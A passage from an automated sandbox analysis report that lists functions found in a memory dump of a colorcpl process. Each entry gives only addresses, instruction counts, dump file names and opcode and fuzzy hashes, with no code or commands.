                                                                                                    • Instruction ID: 20d66fad260dfd9ef45781d69ec59f2bbf36691d52cf9c551bb289eeb3d8059d
                                                                                                    • Opcode Fuzzy Hash: 61a05f2e583a7f8459c8a446ac862a951a5c744327d893a3cbcb345d9d0b580d
                                                                                                    • Instruction Fuzzy Hash: B1F0BEB2611169BFCB08CF89CC80D9F7BACEB057A0B50436AB506DB251D630EE00CFA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6E5930 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1c1e0596cc6db6671efa1ae131eba045ee99a3925ee5525dd3afa0d482156a32
                                                                                                    • Instruction ID: a9442d2881cafd387467d6262f4937208342f03168d9910f7d04ccc33e7a1435
                                                                                                    • Opcode Fuzzy Hash: 1c1e0596cc6db6671efa1ae131eba045ee99a3925ee5525dd3afa0d482156a32
                                                                                                    • Instruction Fuzzy Hash: B3F0B436241185BBC7129E45DC00F873B2AEBC4BA0F500124F6084B5A0DA31EC11D7E4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E671BEF Relevance: .0, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1e06ed61310b1d794269c9836913e5a980f308687efe4163e3217f76fdbfaa08
                                                                                                    • Instruction ID: d835eb27943e65b4fa311fc74ac3593211dbcae08c9df48a6f69717c94252c46
                                                                                                    • Opcode Fuzzy Hash: 1e06ed61310b1d794269c9836913e5a980f308687efe4163e3217f76fdbfaa08
                                                                                                    • Instruction Fuzzy Hash: 9BF02770791662DBF7169A78DE01B0633E3BB91740FA44639E045CB5A0EA68DC82C781
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EF6C7 Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4e4f965a61f215541276479b4b6d7cd71d22ce5b68bb813e93710f84c44fdab7
                                                                                                    • Instruction ID: 1ed2d52578b3134048b5f3cf60a8579d7c523cea0265978c3a0a965a74820bb5
                                                                                                    • Opcode Fuzzy Hash: 4e4f965a61f215541276479b4b6d7cd71d22ce5b68bb813e93710f84c44fdab7
                                                                                                    • Instruction Fuzzy Hash: C2F06D75A11288EBDB04DFA9D945EAEBBF4EF08304F804569E501EB281E674E900CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BDEAA Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9b72c1dd50dff90e1c4b718c40104cfda6149b4e8ac6573aaf0814be1314b689
                                                                                                    • Instruction ID: 860da7abb2cff2a84b64e212f6dd2def02e979de33ad0efb3ac2a56093d4b82e
                                                                                                    • Opcode Fuzzy Hash: 9b72c1dd50dff90e1c4b718c40104cfda6149b4e8ac6573aaf0814be1314b689
                                                                                                    • Instruction Fuzzy Hash: 6BF0CD76602340DFD314CF94E540B58B7B0EB45724F60CA7FC0168B690CB32A801CF04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E669B28 Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: be8f275fb45caa31bc9cbe4e476abc5161cde76dbe801e8e1b42d620e4b65110
                                                                                                    • Instruction ID: 86fa32ed71e44ef57534a3d76d6f0ee0a48cb4670db730459ef26e91cce6e567
                                                                                                    • Opcode Fuzzy Hash: be8f275fb45caa31bc9cbe4e476abc5161cde76dbe801e8e1b42d620e4b65110
                                                                                                    • Instruction Fuzzy Hash: 4AF0BE39D226E5CFD311C719C988F46BBEAAB86AA0F855A24E64587912C328EC40C650
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62BEC0 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 27ec3afdf15dce7045b826a293e6eb366372731b24bacc3529fe095728e4fd66
                                                                                                    • Instruction ID: 10d966506034774bfef4aa0f2e9bf81931fed10605bf447c3d9d06901fc88ef6
                                                                                                    • Opcode Fuzzy Hash: 27ec3afdf15dce7045b826a293e6eb366372731b24bacc3529fe095728e4fd66
                                                                                                    • Instruction Fuzzy Hash: B2F0E2711115838FC716CB19C950F15B766FB823B0F958379E9664B9A1DB24D800CB84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EFC4F Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 80ca61f3288c51d0b87e7d001a6fc51f0dcca765c533c5073ee7004e3d28116e
                                                                                                    • Instruction ID: 957f76e0db0fdba194623cf1eb9eb6683664d9bcb45f912679797cfbc9c0c895
                                                                                                    • Opcode Fuzzy Hash: 80ca61f3288c51d0b87e7d001a6fc51f0dcca765c533c5073ee7004e3d28116e
                                                                                                    • Instruction Fuzzy Hash: DAF0A775A02288EBDB04DBB9D95AF9E77B8EF08704F900554E502EB2C1DA74ED40C759
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EFBF3 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1ea122ef26d0356b5436f4e1e4d142718a0b464fef2285af27d0814637061948
                                                                                                    • Instruction ID: 2a2782fe7398f9c91c1ac3245f4a07cadedf5def93fa28e7ab433c78ef6a1b16
                                                                                                    • Opcode Fuzzy Hash: 1ea122ef26d0356b5436f4e1e4d142718a0b464fef2285af27d0814637061948
                                                                                                    • Instruction Fuzzy Hash: A9F0A771A02288EBDB04DBB9D95AF9E77B8EF09704F901554E501EB2C1DA74ED40C719
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EFB97 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dbc8035a8f8ffac40aebbd0424024af1fcaab450d302894c4225e6153dbd4e46
                                                                                                    • Instruction ID: 16cc541dfd3feee83b04ed1f0da31e44c7e7c9d6aade5ce7b3b82491a57f7281
                                                                                                    • Opcode Fuzzy Hash: dbc8035a8f8ffac40aebbd0424024af1fcaab450d302894c4225e6153dbd4e46
                                                                                                    • Instruction Fuzzy Hash: DAF0A075A0228CEBDB04DBB9C95AF9E77B8EF08304F800599F601EB2C1DA74E940C759
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BB953 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1626d060ce2a7d3b3697f941c928d20152f223b2e19af32d82154d37a5088328
                                                                                                    • Instruction ID: d42e177bade4aaef73b4713855de8e31c1c9c7625bb677e5c26201692671018a
                                                                                                    • Opcode Fuzzy Hash: 1626d060ce2a7d3b3697f941c928d20152f223b2e19af32d82154d37a5088328
                                                                                                    • Instruction Fuzzy Hash: F1F0E572B01254BFEB30DA898D05F9AB3ACD782B75F110275B501E71C0C6B49E00C394
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6B9983 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 714da2a1c4f1efc1161e20e655b19aedbdd7afa7e59196edeb41504cf78fc0bd
                                                                                                    • Instruction ID: 407d5e2ba198f92f4f7f790e65bdc23672200a2e1e5a88d4a99b1b231b960dc6
                                                                                                    • Opcode Fuzzy Hash: 714da2a1c4f1efc1161e20e655b19aedbdd7afa7e59196edeb41504cf78fc0bd
                                                                                                    • Instruction Fuzzy Hash: 8EE02B32720254AFEB04DB58D940F4A33EDEB8D758F08009CF40AD7140D670DE00D780
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EF72E Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0dd50ceb6795b47ade68664fa709b583edd297e3422a76fe84efd11e6f8db54d
                                                                                                    • Instruction ID: b59faf10eb00ac9f1deaf023757e217468b017ff9f77db25511332bc8e694af3
                                                                                                    • Opcode Fuzzy Hash: 0dd50ceb6795b47ade68664fa709b583edd297e3422a76fe84efd11e6f8db54d
                                                                                                    • Instruction Fuzzy Hash: 06F02774A12288EBDF04DBB9D95AF9E77B8EF08700F800154F101EB2C0DA34E9008718
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66182A Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 58fbbcf199b8bdd28eabfd575b713fcc364720f4c43178bfe78a3647d3dad58d
                                                                                                    • Instruction ID: fa348a2a8f04fd278a045ccfe33f33d1f769da6f99825ebe7d1c8b7539a4df5e
                                                                                                    • Opcode Fuzzy Hash: 58fbbcf199b8bdd28eabfd575b713fcc364720f4c43178bfe78a3647d3dad58d
                                                                                                    • Instruction Fuzzy Hash: 63E09272A52821ABD3118A599C40F5673AEEBE9660F5A0539E544C7220D628ED01C7E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E637D75 Relevance: .0, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c302cbae27b5571972a90e8c402ca34e50d6c97a953fa7a80cbfb8759a8e20e1
                                                                                                    • Instruction ID: 572059dbc08ff7c9a5f1b909dfff041de4bf01e0da78c9666e21113eab9fb2b0
                                                                                                    • Opcode Fuzzy Hash: c302cbae27b5571972a90e8c402ca34e50d6c97a953fa7a80cbfb8759a8e20e1
                                                                                                    • Instruction Fuzzy Hash: BFF0ED31A212D5DFD311CB29C584F0277F9EB023B1FA68B69E40A8B615C738EC82C294
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E627931 Relevance: .0, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d33d6b9f7fabe44203ebe765e78a878f36cb71f40b61d43e5cf9315c3b59f614
                                                                                                    • Instruction ID: faea1f6890ec6e0124556913923a039b9ca8aa034d36b68eae9ae1590851ac5d
                                                                                                    • Opcode Fuzzy Hash: d33d6b9f7fabe44203ebe765e78a878f36cb71f40b61d43e5cf9315c3b59f614
                                                                                                    • Instruction Fuzzy Hash: 21E06831A103D793C7209A10C880FAAB3AB9F82B04FD08371F4005F650D769BD41CBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BDD47 Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9e325588acc6b15edc20011f99a642b4b4c24f3113330be6afd0f5f2d9cd3cee
                                                                                                    • Instruction ID: d8b2a7b17026ff454b71df5f00d131b6b1d0464b9f6a3330404018f67cd56fc7
                                                                                                    • Opcode Fuzzy Hash: 9e325588acc6b15edc20011f99a642b4b4c24f3113330be6afd0f5f2d9cd3cee
                                                                                                    • Instruction Fuzzy Hash: 38F05E72A11396DFE750CF98DA8474877B4F748721F90C63BC1428AA90DB356494CF05
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62D878 Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 95576071c67a317adbe288b1b7625a9bd37d79af1005b6d5a14a95f7d051aeb1
                                                                                                    • Instruction ID: 25e80b2f7c66a2762dfc6edbf904d877b2b3353ca58cd3670fb5235411249ea1
                                                                                                    • Opcode Fuzzy Hash: 95576071c67a317adbe288b1b7625a9bd37d79af1005b6d5a14a95f7d051aeb1
                                                                                                    • Instruction Fuzzy Hash: C6E0DF33A01114BBCB22A6998E05F9A7BADEF94BA0F920564B500E70A0D620EE00CA90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62BE78 Relevance: .0, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 156e13366ecf80be3081f2b2274d6134dfdc911ce20f9e366b099422a7fcba0b
                                                                                                    • Instruction ID: 8c5dfd88f1d51ef35a677db51caff8623e2063f59f06926be8c8615968ba2e4f
                                                                                                    • Opcode Fuzzy Hash: 156e13366ecf80be3081f2b2274d6134dfdc911ce20f9e366b099422a7fcba0b
                                                                                                    • Instruction Fuzzy Hash: 1DE0C233201890BFEB130AA6CC80E62FB6EFB846B0B240135F52482530CB22AC71F794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66BE51 Relevance: .0, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1fbc1a57687687429949ef68cda6319bf2983e9682e37ceea575ce143fddd903
                                                                                                    • Instruction ID: da4444fcc6215de027020eb8c33b220f87e2d52bd75dafdfe2143791c6550720
                                                                                                    • Opcode Fuzzy Hash: 1fbc1a57687687429949ef68cda6319bf2983e9682e37ceea575ce143fddd903
                                                                                                    • Instruction Fuzzy Hash: 3DE068362936A0DBC7326F04ED20F4237A2EF45FD0F810A28A6120B9708320BC80C684
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E641C60 Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7b69316f2a678296f67ce15432139b0828e7004bd50b89fd2610b62a5d5ddeea
                                                                                                    • Instruction ID: 6ddceabeacc46cb86681f3397965c8d39ffc5da0eae8e4c4d077d1830d5808f0
                                                                                                    • Opcode Fuzzy Hash: 7b69316f2a678296f67ce15432139b0828e7004bd50b89fd2610b62a5d5ddeea
                                                                                                    • Instruction Fuzzy Hash: 55E0D835722AB1DBC7018B168C64D39B3C78F82A64BA58B15D41457601CB28EC008695
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65DAAE Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fba1a1ac6ad799d61c2ddc326d185083a10fe0a07a476c97b5d34b5c0ba45396
                                                                                                    • Instruction ID: 6b8316bdd371f628833a34a57af5d77745f88439a5f3fcb0944a76ebe7898fa2
                                                                                                    • Opcode Fuzzy Hash: fba1a1ac6ad799d61c2ddc326d185083a10fe0a07a476c97b5d34b5c0ba45396
                                                                                                    • Instruction Fuzzy Hash: 3FF08C71511B908FD324CF18D550BA273A9EF85764F14868CE01A8B696C776E883CB80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E703FC0 Relevance: .0, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c6fb50ee119d11f19fd4a5785dab16f6663d957cbb062c844309bb72431b8e05
                                                                                                    • Instruction ID: d50e1a486fbb0d29fbe074bee95840039720c61ffa154b0ac931eeef02d7260f
                                                                                                    • Opcode Fuzzy Hash: c6fb50ee119d11f19fd4a5785dab16f6663d957cbb062c844309bb72431b8e05
                                                                                                    • Instruction Fuzzy Hash: 93E0DF77211550ABC311DB69DD00F4AB3EDFFE5B21F51062AF2089BA90CB70B802C798
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62FEA0 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0e90c4812e7d238853ab95c2f385ff84d52659db3c9c1a0d22b5f5c4e38c4305
                                                                                                    • Instruction ID: 9d9f86ae611768508af3e8beeed652505a1b45c06fb024f304f7295191f311f4
                                                                                                    • Opcode Fuzzy Hash: 0e90c4812e7d238853ab95c2f385ff84d52659db3c9c1a0d22b5f5c4e38c4305
                                                                                                    • Instruction Fuzzy Hash: D2E0DF3262038B6BD312C614D58270237ADF791A58FE08435E9A0DAA83E229E481CE40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66BFB0 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dfbf427b3481e61aaf70de16c6999f206e4e51b409c523ac800f451efbe08988
                                                                                                    • Instruction ID: f7148f18426f51fdb2095e14e07a8d51bf08055e25f15ee5baf972629d60122a
                                                                                                    • Opcode Fuzzy Hash: dfbf427b3481e61aaf70de16c6999f206e4e51b409c523ac800f451efbe08988
                                                                                                    • Instruction Fuzzy Hash: 25E0DF351212C8FBE700CF01C848F2837AAEB48B28F809615F60A8B070C774E981CF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6C5AD0 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c545d50f61dea5e671e22edea6ff08ade0f67ffca453c31370c0e8b5fadfe58e
                                                                                                    • Instruction ID: bae8e8af8951e7f71ed439ecf5cc4292ca311b2f851fc1c890653bb5ae0e1947
                                                                                                    • Opcode Fuzzy Hash: c545d50f61dea5e671e22edea6ff08ade0f67ffca453c31370c0e8b5fadfe58e
                                                                                                    • Instruction Fuzzy Hash: 0DE08C32150684AFD3219A4AD948F82BBE9EB55370F40C82AE65987960C7B9F890CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E631F50 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 567c7d1a26a07e01f29db5989ade6dca788771ebd87a95dfba10e40db38a2c29
                                                                                                    • Instruction ID: 2bdaf90c88e123569e8cf0d92bbee10314dfe2a3773a97107a67e5cc2abffb9b
                                                                                                    • Opcode Fuzzy Hash: 567c7d1a26a07e01f29db5989ade6dca788771ebd87a95dfba10e40db38a2c29
                                                                                                    • Instruction Fuzzy Hash: 24E0C23C61128ADFE700CB1AC044F15B3F65B897B6FA5971EE41C4B651C738E8C0CA04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E643D00 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b5dbad98ca396276ebc9ccf29ee687559bfa97ca8fa48a46d0d88d24f68f4374
                                                                                                    • Instruction ID: 5065b562680b600ba9c7d30fe231365b183413157cfce5d8d455f4970d9463c0
                                                                                                    • Opcode Fuzzy Hash: b5dbad98ca396276ebc9ccf29ee687559bfa97ca8fa48a46d0d88d24f68f4374
                                                                                                    • Instruction Fuzzy Hash: 2AE0C7B0A010128FCB0A8A14CAA0B0937BBAB86B08F6481A8E00382028D334C896EB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068C72DC Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
